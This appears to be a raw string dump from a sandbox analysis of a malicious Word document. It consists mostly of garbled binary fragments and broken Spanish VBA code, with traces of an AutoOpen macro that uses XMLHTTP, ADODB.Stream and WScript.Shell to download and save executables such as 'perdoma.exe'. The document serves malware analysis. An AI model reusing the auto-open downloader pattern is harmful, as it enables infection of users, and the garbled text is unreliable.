Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

gPub(licm (N`ombreXAPs Stg%Dim f I^ger]ixCPE

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h Nh"h$h&h(h*H,L .H0L8(i2``4`6`8`:`<+jH)lhin`p`rhTi2``4`6`8`:`< @i2`X`8`<`B`H`N` R` 8``` X` 8`8`,\` ^` 8 i28`,b`8 h` 8`8`,b`,b` l` 8`8`,p`'`` t` x`K `T.X%i2N`8823i28`8KT6

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

h@%%% @@x@peoX$*\Rffff*07586f65e44"(/A@o`XAttribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

HiNarhi...

Ansi based on Image Processing (screen_4.png)

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

Unicode based on Runtime Data (perdoma.exe )

hU,1h. A!"R#n$n%B@B1KG=K9CJ_HaJmHsHtHBABA=>2=>9 H@8DB 0170F0XiX1KG=0O B01;8F04

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

I8NI_}TExcitacionNInSond"aOutTPorizNTNolrm@OFCArrar_cUG

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INCERathMedidaaClaveNOFREC 1`]ix(VaDl(NLe.sn(

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INI_o`%5)V|C`^xT0Z6_tc(X6#@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

INSONDA, InSo9sSN D_E.XPAND(8!"ROUT,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

IQ```a\a_`_URR]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

IQ`LLLLLL\]a_a]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

iuTransSGmpte_GoTo @VIf frmAesado.optSNIFTD@.ValueTrThBg=C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j% KT ' TKT 'n j% KT ' KT 'n j% KT ' $KT "' (KT &' ,KT *' 0KT .'n8 j% 6KT 4' :KT 8' >KT <' BKT @'n ' 2 FICHERO_MED !!d `

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pkx H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

j%b `k4 !! ~ ~ ~ ~ n%p 2 n%p D n%p n%p F n%pk3 H n%p

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

K2@K2@

Ansi based on Hybrid Analysis (perdoma.exe , 00177718-00001784.00000001.200171.401000.00000020.mdmp)

KEc"P`xINSBWE(2"N_ehU aU]4SY

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

l4a.k.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

l__''_:::''_:::''_:_l

Ansi based on Image Processing (screen_3.png)

l__'_.::'_.::'_._l

Ansi based on Image Processing (screen_1.png)

LElevated.EXE

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Line #f, C;7= ExtraeDatoD.cha(CL@SelectWseG.oIzqdCaClaveNOFREC#D:ix((S inLe.@s()t!p>= 1Is";DsMax sLimi,in,ax

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Manipular0Erro\yNo existe Pel fs 0s@t? da?

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ManipularErromi@MsgBo@x("No p udo g el fichero correctp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

mataSplit(UserForm1.ComboBox1.T@ext, NrHeFiProGoTo QQ7pwEiMsg("Se han ignorado algunas en@das, comppbe lanfiguraci?n", _4vbOKOnly + vbInf

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Microsoft Forms 2.0 FormEmbedded Object9qVERSION 5.00

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

mKZEFV\$9-%TEMP%\VBE\MSForms.exd

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk0 L `k J V "B@A@|

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n%pk83 L `k3 J V$2 "$. " (A@2|22

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

n,p JKT LKTS0'<n $N VP R!T!d 2$P'.V

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NewLi ne & @.DescripCriticalERRORResume N

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NH* P!R T V'Jd(* X'Jk* 4 KT 'L KT 'L KT 'Ln) ' H Z | L \ V^`)|X)NP),No se pudo guardar el fichero correctamente. ` H Z ` b!d Z fERROR NORMA$X'8(o((Attribute VB_Name = "Module1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

nte."sPathovbOKO nly +Critical, "ERROR PROCESADO DE D%S"!1<ResuNe0xt

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Num_simulac`e1yAo2`@O`n Err`yb{Manip`rbqazrflbYInpf@DoLine #f, #d= ExtraeDatoD.0cha(#Selectse@.oIzqdiCa"", " @q1aVaAsteriscos &X"FICHEROp_MED.L(&s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NumSimul6%NO_SIMUL5"Ohres.chk7o.ValueChepckedyA7ay"cai

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

o` i r(4)or

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

OOK.1 p!Jj??6, S;]80cwROU#9eTHETA_SEp?p(1uLPHIND(13P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.40D000.00000002.mdmp)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

p }t 0ho(UserForm1 q`Z q`ZfW^oXCompObj\aAEH,z*-Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P0<INS0+_cz/$(nN_2WU4UU]4oo4venGInnpn .FU(7<nIInt9Zbt/NSF_=&NCAMBI"|2:SIFCO/'i}CRCMPTE-PXY>yAEobFTxHPHo`R<HLEM|EMFORMAT))cSIaB

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

p9() As Variapnt, 36E_10Integer&Stri ng

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

perd4unc@t`E_5/.@4%"\!oma.exe_GuardarF!! "=!PublicA# (NoAs String-Dim f @Integer,!i/b)CPEINI_=mC,TE0xcit9^In Sonda~OuFt!TPo!iRzTN'l FCR.r_cGirar_uTransmp(VTLGoTo 09yyoptSNtDG?uJ=0?QGANT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

piIncer(N@ombreF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Project.ThisDocument.autoopenPROJECT.THISDOCUMENT.AUTOOPEN@TM`@UnknownG:AxTimes New Roman5Symbol3&:CxArial"hiAiAnr4C!='3HP)?U2Microsoft OfficeMicrosoft OfficeOh+'0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public Cargar@|cs(NombreFichero As String Dim fIn`teger@pB`uffer

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Q!HNextoV =Gxu!FySub L(N ombreAero]AmfuBuff@gCadenaGEDiAuxFallBoolean= sebHayS`NIFTD;EXPAN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Q,Ca(1)62hokuk_S3?E_3R.Environmentf4!Vq2(rTEX8CIT i,$PrefLINX@|c(nQ#ddYoe`afCIR&d"B52

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

qkFSbHLYBVHgM.[~^JL,BMPDocumentautoopen

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

QyL-[DRE%PROGRAMFILES%\(x86)\Common Files\Microsoft Shared\OFFICE11\MSO.DLLOffice

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R0SF. (3MsSinLe.9s(MLF:I/4$/4)9)5GSonda_GnG6C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rFACTE~XDyRA[l[NICWs(I!r%1P FQRtTFallo7`%Loop Until EOF(flowperd:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

s4m7aDOUI.FU=3`2On Err@BSManipularbIR] JfPZlApO0pen K2In(putazf@DoALine #8f, c= ExtraeDato.Dcha(c#SelseI.zqdCa"", " SaaVacia

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Software\Microsoft\Office\Common\OffDiag\6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

SONDA_1aCm2tm3tm4tm5ts?!$!15U!!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sProc(6) = frm`esado.optEXPAND.ValuebHayH7chkFresnelIfZChecked ThenA_SFIFT^TbrrElsyFaEnd If~8~CPCz)zCN==9=P==P==10=oord>?U]A_Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

sSF.IFT(5) = SinLe.tras(Case ClaveGSondJa6pExheDat.oIzqda(CadN6)`C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sSNIFTD_E.XPAND(16)TPriFIN_CPE, vbN@ewLineFE nd IfIf frmProcesado.chkFresnel.Value = Checked` Then1^Asteriscops &

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

THETA_SE(,A!>vE$2a.to<E]&F[)dPHI(1H-?&/rD.r7"948@!O>|O>l7O>D(1K\]_>f#_>_o>_o>B>TDwP}oB"\-,HVwac!cEj]OOseR K(sSxu.LFIO%a$-$9O+adena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

THETA_SE(QVA!>9J$R?2d1|_EiPHp8D(1rANBx9RT{!1@!I>ExtraeDat.oIzqda(Cadena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ThisDocumentThisDocumentModule1Module1UserForm1UserForm1ID="{7DE7D2EF-3048-46DF-83F3-B33C701AB187}"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TTTTTTTTrTHUPU"XU`UhUpUxUUUUUUUUUUUUUUUUVV(V8VPV`VhVpVxV VWW W] ] ] D0] H] `] x]$]]$]X]p]]]]'<'>'@'B'D'F'H'J'L'NP 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TuTogSBFqD0(5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

unctE_6.Ope8n (0L5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctunc2_10ChrK~0Pot_ruido30Drift0DriftMod0LeakageM0CablesJuntas0CablesJuntasModj0Dut0Sgh0Cables0Num_simulaciones\0Junto2<0Junto+0sPathMedida`0sPr0oc10CreateObject0hokuk40Environment50perd20

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_6A0STILL_ACTIVE0mandatac=0PROCESS_QUERY_INFORMATION=0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

vbCritical+}0CargarFichIncer0AddFieldToField0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

vbInformationn0SalirCargarProc50vbNewLine0Erro0Description 0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

VS_VERSION_INFO

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

wwwwwwwwwwwwwx

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Ansi based on Dropped File (g545[1].exe.177218)

X+002pSQfWordS10VBA0Win160Win320Mac0VBA6#0Project-0stdole`0Normal0Officeu0MSFormsC0ThisDocument<0_Evaluate0autoopen*0CargarFichProc00Module1b0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xdlt|Microsoft OfficeNormal.dotMicrosoft Office2Microsoft Office Word@F#@`Z@`Z.+,0hp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

xME 8@X`&(Ph&&&8`hx 08&X&&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k8 !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k7 !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 8 ^ V 8 `,b 8 8 d V 8 f,b 8 T f,b 8 h V 8 j,b 8 T j,b T j,b 8 l V 8 n,p 8 T n,pr ' 2 _ 4 4 t%v'6 4 x%zK K |KT ~ ~KT KT 6+R KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\k KT 6 % Z,\ Z%\ % Z,\ 6 %'6 6 % Z,\ Z%\ % Z,\ KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Zs4m7d"(IFUI.<FU=3`2Pot_ruidoLA:DriftModPLeakage0CablesJuntaabm

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

DiagnosticsIdentifier:(SZ) 6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Ansi based on Dropped File (369281.od)

OfficeDiagnostics Information

Ansi based on Dropped File (369281.od)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (Explorer.EXE)

! DRIFT_dB !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! DRIFT_GRADOS !!dkH

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! S/N_LEAKAGE !!dk ! CABLES_JUNTAS_GRADOS !!dk ! CABLES_JUNTAS_dB !!dk8 ! NO_SIMUL !!d `k !! JUNTOS `d JUNTON `k`VX "$. A@0 !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!!!!CN.}(11 hecked+'d IAaUncNO0C:-rJ02oAMBIQ3UNC'CO?WqVrbpTCallBy:N@|(` 1, maPhta(, VbGet`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!"#$%&'()*+,-/0123456789:;=>?@ABCDEFGHIJKLMNOPQRSTV[YZ]_`abdfghijklmoV*{~<SbHLYBVHgM.[~^JL,BMPx~^JL,BMPSbHLYBVME(S"SS"6"(1Normal.ThisDocument`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!#i0 -!-Step 1b&#Re!CBP`erve#1(i"ag'@ > F1-< "Next >i"&cALoop Until@ EOF(fa"Clo@@@NSalirlW:AxitAu

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

" (08@HPX`hpx

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8VA@h ( *B@o]]'r p l l r p$l~& n n n n$t'r p r'ji]8]P]h]]]'<'B'D'F'H'J'L'NPp 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

#$U"D"vCHRNFIf <> "" ThenR$wLg9OMIfKPRB8R}%eFI

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

#SF.<~INI_#

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$. $' "$. " A@$= n%p KT ' $KT "' (KT &' ,KT *' 0KT .'n< n%p 6KT 4' :KT 8' >KT <' BKT @'nX<P< ' 2 !!d ` !! 8 !! 8 !% 8 ` !&! ~ ~ ( ~ ~ `k: !*! ~ ~ , ~ ~ `k8: !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$L1&.]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld 0'Lk0o0X] 2' 8 !! 8@0 8 !% 8+0 8 !&!+R$R '>dH/'>k8/ !*!+R$R '@d.'@k. !!d+R !!d'4 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd.'Fk. !!+R$R 'Hd-'Hk- !!+R$R 'Jdx-'Jkh- !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld(-'Lk-o-]P]h]]]]'<8, ' 2 _, 4 4 %'6 4 % KT 6 % %$': :'N <': @'> 8 : 4 8@0 4 % 8+0 4 % :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

% KT ' KT ' KT ' KT ' KT 'nH

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

% KT ' TKT 'n

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

%Y5'CIRC2bt)s,_E.)(7Ar

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&0X`&&(@H`hp&(PX`hx&@HPXpx(0HPXhp&8@&`&& (&Hp& (x0r@H

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&8&X&& 08PXpx&&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&i = MsgBox ("No pudo ge el f4ero correctamente." & _GosPaBtJeso,OKOnly +Critical, "ERROR PROCESADO DE INCERTIDUM BRES"Resume Next

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

''"S/N_RUIDO"XfrmAnalisisIncertidumbres.txtNivelRuido.0TextvPot_rACDRIFT_GRADOSDriftZBUdBcxModANL@EAKAGELeakageZCABLES_@JUNTASOCablesJunxtas

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'N 8 : 4 4 % 8 , 8 % % 8 , 8k(P $.$. $.$."$.$.*$.$.$. %.$ KT 6 KT +R KT +R KT +Rn8 KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\nH 6 % Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'N 8 : 4 8 @ 4 t% 8 , 8 % % 8 , 8k@ KT'> +R KT 6 KT +R KT +R KT +Rn KT KT'@ +R KT KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\n 6 t%v Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(08HP"`hpx

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(8@HPXhpx (08@P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(bK*y*\CNormalrU~~~~~~~~hSM$taI)!UczLWa}o9ProjectThisDocumentModule1UserForm1F/%PROGRAMFILES(X86)%\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLLVBA

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S8SPS`S$hSSSSSSSSST(T@THT`TxT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(S<S<SS0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}h0(%X0%0xAttribute VB_Name = "UserForm1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

*t}+lNO_SIMUL+Num`Simul:_saciones

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+(+@+H+&h+++&++&,(,0,&P,x,,&,,&,-(-H-P-h-------..(.H.P.h.........//// /(/0/8/H/P/xX/////r/h0p0x0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

+R KT 6 % KT n,p KT T n,pS( n,pn 6 % n,p n%p % n,p KT 6 KT n,p KT n,pnh KT 6 KT n,p "KT $ n,p &KT ( n,p *KT , n,p .KT 0 n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,GuardarNORMA(Tmpo, AConfi>gKPEXT 7aTExc *G@GuTMedida.InicialesY`_CLBeocBR_CCLPeis"'LINX= 6f4JYON1GCIRF74*Sni"xt _CIN ABOuJtSPct AChar%aVa3"", PIPOLD2?2'a}28pu0do g#)3coDrr\ameo." &1'3x*5i5,555B 44

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

,No se pudo guardar el fichero correctamente. ` Z fERROR PROCESADO DE DATOS$X'8@2o82] 2' 8 !! 8@0P 8 !% 8+0 8 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd1'Fk1 !!+R$R 'Hd0'Hk0 !!+R$R 'Jdp0'Jk`0 !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

- 1)ReAPreserve@Mro.c1`B 8-I(a2f}End I</(INI>_Ic(2\CTEXxCIT@>+0fLINX@NddYoe`afCIRd12rFINvWCOMPi*cF?ve4U 5s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-1\nt #f, ClaveOUTSONDA, OutSonda, _

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-8,!2_1!Be=-For-= L Bound]) To U@%1& ChrE_8) - 9854-

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

-90THETA_SE11+4-12SPHI30

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.`M%WINDIR%\SysWOW64\FM20.DLLMSForms

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.`ME{ThisDocumentGT@isDDjcueTn@2Q`H1x0-",~*""+Godule1GGo{u{12@3, !Ar0*U@ 8erfWa2C/-h*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

.De`scrip#Critical ERRORRe@sume N@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0*i2KT``4KT`6`8`:`<+D@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

00"00000000001111 1(10181@1X1`1h1p1111111111111112222 20282@2H2P2X2`2h2p2x222222222222222333 3(303@3H3P3X3`3h3p3x33333333333333334640H4x4$4"4

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0046}#2.0#0#%WINDIR%\SysWOW64\e2.tlb#OLE Automation`ENormalENCrmaQF *\C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0ClaveTHETA_CK0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0P0RmvJ=qbuGJ>Mn!`jEh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

0UserForm1XrU@$`n@LG{h

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

1bi.F. 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

2KT 6 % 4KT 6 n,p 8KT : n,p <KT > n,p @KT B n,pn

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

3)`Ihc> VheAbAaYTruD8- 1wX.oc1S77 \w8].TAISAbSe|1!reateObj(mandata`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

4 %':k+ 4 % > 4 %'>kP+ 8k8+n0+ $N VB+|+8+"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8*ox*

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

445&5@5H5(X555$555(56606H6P6,`6662666*707*87h7p7x7777777,8886X868,889909H9X9p99999: :8:@:X:p:::.:.:$;.0;`;;;;;;;;.<.8<h<<<<<== =8=H=`=$p===$==.>0>P>X>.h>>>>>>>

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5 2AVbMethod, i@

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5B A?8A:0 "&$0{vhM<UV.

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5Q384 e(14FSONDAi5spsPsbsSsPPs+T0&sJs1%skHnHCHsEs#E5CHRNFh+1+;If %<> "" ThenH6liqmIfPRBh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

5TahomaComboBox1im

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

6 % n,p n%p % n,p DKT 6 % n,p n%p % n,p 6 % n,p n%p % n,p FKT 6 % n,p n%p % n,p HKT 6 % n,p n%p % n,p 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8$/8/FACTEXP9009010

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

85LROU1.9B7t.ras(C"0" TDcw%ElRoAn!<=

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8DHDXDpDDDDDDDDE(E8EPE`ExEEEEEEE,F0F6PF6F,FFGG(G@GPGhGxGGGGGH0H8HPHhHxHH.H.H$I.(IXIxIIIIIII.J.0J`JJJJJJKK0K@KXK$hKKK$KK.K(LHLPL.`LLLLLLL LLMMxMMM"MMM$MMM

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8kCPTHETA_CECN^-I-usDf d8L PHI9P910ZCENTRARbB";I211A,8NOUnc+=Els!cGray)@perd2:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

8PHP`PxPPPPPPPPPPPQQ(Q@QPQhQxQQQQQQQQQRRRR0RHRPRXR`RhRRRRRRR"RRRRRRRRSSS S

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

9ap0F%WINDIR%\SysWOW64\stdole2.tlbstdole

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

<<Se han ignorado algunas entradas, compruebe la configuraci?n Z \AVISO PROCESADO DE DATOS$X'8kP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>"$!)`bjbj.{{"""".FFFFFFFFeeeeee$hjFFFFFFFnnnF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>??????"??????????@@@@ @(@0@8@@@X@`@h@p@@@@@@@@@@@@@@AAAA A(A0A8A@AHAPAXAhApAxAAAAAAAAAAAAAAAABBB B(B0B@BHBPBXB`BhBpBBBBBBBBBBBCCCC C0C8C@CHCPCXC`ChCpCxCCC*CC$C"D

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

>fI@ntegerB`ufferCadenai Aux

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@-= 0 ToAnsistidus.lstpcuencias.ListCoup- 1ep 1ReP0serve s1(i0?o

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@_R$BbROU&9;E"0" .TFCV ElroAh!A

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@srU~}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

@|oc@F(F?oc(2T!NAz61y i` 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Host Extender Info]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

[Workspace]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

\A4MsgBox("No existe el fdz`st? da?" _& vbNewB]&j.Description,BvbOKOnly +`Critical, "ERROR PROCESADO DE DATOS"Resume !"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

]9pU(3CPXbFcO%2JAECTHPH%6RHL=%6pEMEM|$%tV4[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_4Sen94p>3(u\mvm'PNI.FU(5) = SinLe.tras(s)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_EgQ+7l2so= h1l o h1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

_uC O#s.TDd(7!/GVSONDA_1&= Prefw22q3q4q5q"A_$F'F%qT.1567u#a0A_q<A_A__-"CTx(11wf|GA4IsPUn`e~]NOP9PN.I0 FONo2SINCAMBIQL(CO3[t943;CPXYBS%FAEHPHTH#6RHL=%6EMEM|$_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

`7$`'`7`FIN_SFbkINI_CN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ai`F;%PROGRAMFILES%\(x86)\Microsoft Office\OFFICE11\MSWORD.OLBWord

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

APs St gDim i IPgeri

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Asteriscos &ClaveDAMAn%cNOFREC@a ix(Val"(`oLe.s(Iz.!)MI> he%Tru+cJ[

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ation, "AVISO PROCESADO DE rD DS"SalirCargarp Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

b(=!s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

B> #@PrefCONCAMBIOSs %6#M"CSIFACTEX\"$f F`R <Close .perd9:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas0{4A691620-ADED-4625-B68A-5F1266CFD7FA}{D820E972-EA97-4D95-A1D2-6BA6E67E2007}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Bas1Normal.VGlobal!SpaclFalseCreatablPre declaIdTru

